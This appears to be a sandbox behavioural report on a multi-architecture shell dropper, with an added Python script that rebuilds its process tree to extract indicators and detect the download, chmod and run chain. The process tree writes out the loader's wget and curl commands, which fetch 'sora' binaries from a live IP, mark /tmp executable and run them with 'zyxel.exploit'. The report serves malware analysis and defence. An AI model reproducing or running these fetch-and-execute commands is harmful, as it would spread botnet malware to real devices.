Analysis
- max time kernel: 2s
- max time network: 128s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 18/10/2024, 03:03

Tasks (all four behavioral tasks ran the same sample, ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh; this report is the behavioral1 run):
- static1 (static task)
- behavioral1: ubuntu1804-amd64-20240611-en
- behavioral2: debian9-armhf-20240418-en
- behavioral3: debian9-mipsbe-20240418-en
- behavioral4: debian9-mipsel-20240611-en
General
- Target: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
- Size: 2KB
- MD5: eb7a4e59f642cd5475876f6ef1a09d3a
- SHA1: 9232db0ebfe888067cc85a32b786a7ce41be0a6f
- SHA256: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
- SHA512: 9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  PID / Process: 1491, 1497, 1503, 1509, 1515, 1521, 1527, 1533, 1539, 1545, 1551, 1557, 1563, 1569, all chmod. These are the fourteen identical chmod +x invocations in the process tree below, one per target architecture.
- Executes dropped EXE (14 IoCs)
  IoC: /tmp/robben. PID / Process: 1492, 1498, 1504, 1510, 1516, 1522, 1528, 1534, 1540, 1546, 1552, 1558, 1564, 1570, all robben. The same dropped path is executed once per target architecture.
- System Network Configuration Discovery (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  PID / Process: 1494 wget, 1495 curl, 1496 cat. In the process tree these three PIDs are the wget, curl -O and cat of sora.mips; none of them reads interface, routing or DNS configuration, so this hit is a heuristic match on outbound fetch tooling, not evidence of discovery activity. The otherwise identical wget/curl/cat triples for the other thirteen architectures did not trigger it.
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/robben, by ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh (PID 1483).
Processes

Depth 1 (the submitted script):
  PID 1483  /tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
            command line: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
            signature: Writes file to tmp directory (/tmp/robben)

Depth 2 (children of PID 1483), in PID order. The same five commands repeat once per target architecture and only the payload name after /bins/ changes: fetch the payload with wget, fetch it again with curl -O, read it with cat, mark everything in /tmp executable, then run /tmp/robben with the argument zyxel.exploit. The write to /tmp/robben is attributed to the script rather than to cat, which is consistent with the shell redirecting cat's output into robben (the shell sets up the redirection before cat is exec'd). The argument string zyxel.exploit is passed to every execution regardless of architecture.

Signature abbreviations: FDPM = File and Directory Permissions Modification, EDE = Executes dropped EXE, SNCD = System Network Configuration Discovery.

PID   Process        Command line                                     Signature
1484  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86
1486  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86
1490  /bin/cat       cat sora.x86
1491  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1492  /tmp/robben    ./robben zyxel.exploit                           EDE
1494  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mips         SNCD
1495  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mips      SNCD
1496  /bin/cat       cat sora.mips                                    SNCD
1497  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1498  /tmp/robben    ./robben zyxel.exploit                           EDE
1500  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86_64
1501  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86_64
1502  /bin/cat       cat sora.x86_64
1503  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1504  /tmp/robben    ./robben zyxel.exploit                           EDE
1506  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i468
1507  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i468
1508  /bin/cat       cat sora.i468
1509  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1510  /tmp/robben    ./robben zyxel.exploit                           EDE
1512  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i686
1513  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i686
1514  /bin/cat       cat sora.i686
1515  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1516  /tmp/robben    ./robben zyxel.exploit                           EDE
1518  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mpsl
1519  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mpsl
1520  /bin/cat       cat sora.mpsl
1521  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1522  /tmp/robben    ./robben zyxel.exploit                           EDE
1524  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm4
1525  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm4
1526  /bin/cat       cat sora.arm4
1527  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1528  /tmp/robben    ./robben zyxel.exploit                           EDE
1530  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm5
1531  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm5
1532  /bin/cat       cat sora.arm5
1533  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1534  /tmp/robben    ./robben zyxel.exploit                           EDE
1536  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm6
1537  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm6
1538  /bin/cat       cat sora.arm6
1539  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1540  /tmp/robben    ./robben zyxel.exploit                           EDE
1542  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm7
1543  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm7
1544  /bin/cat       cat sora.arm7
1545  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1546  /tmp/robben    ./robben zyxel.exploit                           EDE
1548  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc
1549  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc
1550  /bin/cat       cat sora.ppc
1551  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1552  /tmp/robben    ./robben zyxel.exploit                           EDE
1554  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc440fp
1555  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc440fp
1556  /bin/cat       cat sora.ppc440fp
1557  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1558  /tmp/robben    ./robben zyxel.exploit                           EDE
1560  /usr/bin/wget  wget http://93.123.85.141/bins/sora.m68k
1561  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.m68k
1562  /bin/cat       cat sora.m68k
1563  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1564  /tmp/robben    ./robben zyxel.exploit                           EDE
1566  /usr/bin/wget  wget http://93.123.85.141/bins/sora.sh4
1567  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.sh4
1568  /bin/cat       cat sora.sh4
1569  /bin/chmod     chmod +x (full /tmp listing, see below)          FDPM
1570  /tmp/robben    ./robben zyxel.exploit                           EDE

Payloads requested, in order: x86, mips, x86_64, i468 (spelled that way in the script), i686, mpsl, arm4, arm5, arm6, arm7, ppc, ppc440fp, m68k, sh4. All fourteen were requested from the single host 93.123.85.141 over plain HTTP.

chmod argument list (identical for PIDs 1491, 1497, 1503, 1509, 1515, 1521, 1527, 1533, 1539, 1545, 1551, 1557, 1563 and 1569):
  config-err-mMHPPJ
  ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
  netplan_dth_3rkp
  robben
  snap-private-tmp
  ssh-cKZATj5ZvKQc
  systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w
  systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC
  systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV
  systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9
  systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV4

This list is the entire contents of /tmp on the analysis image (the sample itself, robben, and the sandbox's own temporary directories), which is what an unquoted chmod +x * run from /tmp expands to. Two things follow from it. First, the script makes every entry in /tmp executable, not just its own payload, so on a real host it would also touch unrelated files there. Second, none of the sora.* payloads ever appears in the list, even though every chmod runs after the corresponding wget and curl -O in the same working directory and no rm is present in the tree; neither downloader left a file behind in this run, so the robben that was executed fourteen times is whatever the redirection of cat's output produced, not a fetched binary. The download host and the per-architecture payload names are the actionable IOCs from this run; the execution-related hits are the loader's scaffolding.
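The triage helper below is an added example for this write-up; it is not the sandbox's code and not the sample's own. It rebuilds the process tree above from the report's PIDs, images and command lines (constructed inline, so it runs offline) and runs the three checks a responder would want over such a tree: IOC extraction (URLs, host, binaries executed out of /tmp), detection of the download -> cat -> chmod +x -> run-from-/tmp chain once per architecture, and a check for chmod +x whose argument list is a directory listing rather than a named payload. The parent PID of the script is not in the report, so 0 is used as a placeholder; everything else is taken from the tree as listed.

```python
"""Triage helper for the multi-architecture dropper in the report above.
Added example for this write-up, not the sandbox's code and not the sample's own.
The process records are constructed from the report's process tree (same PIDs,
images and command lines) so that the checks run offline."""
import re
from dataclasses import dataclass

DOWNLOAD_HOST = "93.123.85.141"
# Payload suffixes in request order ("i468" is spelled that way in the report).
ARCHES = ["x86", "mips", "x86_64", "i468", "i686", "mpsl", "arm4", "arm5",
          "arm6", "arm7", "ppc", "ppc440fp", "m68k", "sh4"]
SCRIPT = "ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh"
# Argument list of every chmod in the report: the whole of /tmp on the analysis image.
CHMOD_ARGS = [
    "config-err-mMHPPJ", SCRIPT, "netplan_dth_3rkp", "robben", "snap-private-tmp",
    "ssh-cKZATj5ZvKQc",
    "systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w",
    "systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC",
    "systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV",
    "systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9",
    "systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV4",
]

@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str

def build_tree() -> list[Proc]:
    """Rebuild the report's tree: the script (PID 1483) plus five children per architecture.
    The script's own parent PID is not in the report; 0 is a placeholder."""
    procs = [Proc(1483, 0, f"/tmp/{SCRIPT}", SCRIPT)]
    for k, arch in enumerate(ARCHES):
        # First block has PID gaps (1484, 1486, 1490, 1491, 1492); later blocks are consecutive.
        pids = [1484, 1486, 1490, 1491, 1492] if k == 0 else [1494 + 6 * (k - 1) + i for i in range(5)]
        url = f"http://{DOWNLOAD_HOST}/bins/sora.{arch}"
        procs += [Proc(pids[0], 1483, "/usr/bin/wget", f"wget {url}"),
                  Proc(pids[1], 1483, "/usr/bin/curl", f"curl -O {url}"),
                  Proc(pids[2], 1483, "/bin/cat", f"cat sora.{arch}"),
                  Proc(pids[3], 1483, "/bin/chmod", "chmod +x " + " ".join(CHMOD_ARGS)),
                  Proc(pids[4], 1483, "/tmp/robben", "./robben zyxel.exploit")]
    return procs

URL_RE = re.compile(r"https?://([\w.\-]+)(?::\d+)?/\S*")

def extract_iocs(procs: list[Proc]) -> dict:
    """URLs and hosts seen in any command line, plus binaries executed out of /tmp."""
    urls = {m.group(0) for p in procs for m in URL_RE.finditer(p.cmdline)}
    hosts = {URL_RE.match(u).group(1) for u in urls}
    dropped = {p.image for p in procs if p.image.startswith("/tmp/") and p.cmdline.startswith("./")}
    return {"urls": sorted(urls), "hosts": sorted(hosts), "dropped": sorted(dropped)}

ORDER = ["download", "read", "chmod", "exec"]

def stage(p: Proc):
    """Classify a process as one step of the download -> cat -> chmod +x -> run chain, or None."""
    tool = p.image.rsplit("/", 1)[-1]
    if tool in ("wget", "curl") and "http" in p.cmdline:
        return "download"
    if tool == "cat":
        return "read"
    if tool == "chmod" and "+x" in p.cmdline.split():
        return "chmod"
    if p.image.startswith("/tmp/") and p.cmdline.startswith("./"):
        return "exec"
    return None

def dropper_chains(procs: list[Proc]) -> list[tuple[str, list[int]]]:
    """Among siblings (same parent, PID order) find runs that start with one or more downloads
    and advance through read, chmod and exec. Returns (arch, pids) per completed chain."""
    by_parent: dict[int, list[Proc]] = {}
    for p in procs:
        by_parent.setdefault(p.ppid, []).append(p)
    chains = []
    for sibs in by_parent.values():
        window = []
        for p in sorted(sibs, key=lambda q: q.pid):
            s = stage(p)
            if s is None:
                window = []
                continue
            if window:
                last = ORDER.index(stage(window[-1]))
                if ORDER.index(s) not in (last, last + 1):   # out of order: restart
                    window = []
            if not window and s != "download":               # a chain must begin with a fetch
                continue
            window.append(p)
            if s == "exec":
                m = re.search(r"/bins/sora\.(\S+)", window[0].cmdline)
                chains.append((m.group(1) if m else "?", [w.pid for w in window]))
                window = []
    return chains

def chmod_glob_suspects(procs: list[Proc]) -> list[int]:
    """chmod +x whose arguments include the caller's own .sh and systemd-private-* directories:
    the footprint of an unquoted `chmod +x *` run inside /tmp."""
    hits = []
    for p in procs:
        if stage(p) == "chmod":
            args = p.cmdline.split()[2:]
            if any(a.startswith("systemd-private-") for a in args) and any(a.endswith(".sh") for a in args):
                hits.append(p.pid)
    return hits

def summarize(procs: list[Proc]) -> dict:
    chains = dropper_chains(procs)
    return {"iocs": extract_iocs(procs), "arches": [a for a, _ in chains],
            "chains": len(chains), "chmod_glob_pids": chmod_glob_suspects(procs)}

if __name__ == "__main__":
    import json
    print(json.dumps(summarize(build_tree()), indent=2))
```

Running it prints one host, fourteen URLs, /tmp/robben as the only executed drop, fourteen complete chains in the same architecture order as the report, and all fourteen chmod PIDs flagged by the glob check. The chain matcher keys on sibling order under one parent rather than on exact PID adjacency, so it also fits the first block, whose PIDs have gaps (1484, 1486, 1490), and it accepts several downloads in a row before the cat, which is how this script's wget-then-curl fallback shows up.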